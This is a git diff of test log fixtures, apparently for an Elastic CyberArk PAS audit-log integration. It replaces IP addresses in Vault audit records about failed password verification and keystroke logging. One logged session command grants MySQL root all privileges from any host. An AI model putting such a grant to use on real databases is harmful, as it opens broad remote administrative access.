\u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:45:51\",\"IsoTimestamp\":\"2021-03-15T14:45:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or 
password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log index 211d487b613..29e2a66545c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log 
@@ -1,8 +1,8 @@ -<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\n\n address=34.66.114.180;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=34.66.114.180;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n\n address=67.43.156.15;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\n","ExtraDetails":"address=67.43.156.15;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 